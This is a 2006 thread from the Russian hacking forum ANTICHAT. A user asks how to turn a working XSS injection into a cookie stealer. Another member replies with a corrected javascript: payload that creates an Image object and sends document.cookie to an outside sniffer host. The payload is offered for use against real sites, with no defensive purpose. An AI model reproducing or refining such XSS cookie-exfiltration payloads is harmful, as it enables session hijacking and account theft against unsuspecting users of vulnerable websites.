HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про сниффер
  #1  
Старый 14.05.2006, 21:45
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию Вопрос про сниффер

Всем привет! Прошу строго не судить! Я просто не понимаю как логически-верно составить код! Вот такое на сайте проходит
Код HTML:
javascript:alert('XSS')
А вот подстроить под него античатовский сниффер немогу! Я думал надо
Код HTML:
javascript:img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
а не получилось... Помогите, а
P.S.<script></script> тама не получается, надо как-то через javascript: это возможно?

Последний раз редактировалось Ponchik; 14.05.2006 в 21:47..
 

  #2  
Старый 14.05.2006, 22:00
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

В хтмл смотрел во что преврошается <script></script> ?
 

  #3  
Старый 14.05.2006, 22:26
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

<script>alert()</script> переплывает в alert() тоесть теги стираются

Последний раз редактировалось Ponchik; 14.05.2006 в 23:05..
 

  #4  
Старый 15.05.2006, 00:41
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию

Цитата:
А вот подстроить под него античатовский сниффер немогу!
Дело в том что у тебя в примере который ты дал ошибка. Для того чтоб сработала
Код:
javascript: img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Тебе надо для начало создать обьект img.
Т.е. так будет правильно:
Код:
javascript:img=new Image();img.src= "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
 

  #5  
Старый 15.05.2006, 18:44
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

CinerX, РЕСПЕКТ И ОГРОМНОЕ СПАСИБО!!!!
У меня вопрос... Это md5? 5cf88br3f7ddb3drdee78ecefr9e2aaa

Последний раз редактировалось Ponchik; 15.05.2006 в 22:15..
 

  #6  
Старый 16.05.2006, 11:23
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию

32 символов.МД5.Тема закрыта.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про шелл KaMiKadZe Уязвимости 8 16.05.2006 11:19
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54
Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg? Уязвимости CMS / форумов 21 24.07.2005 20:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...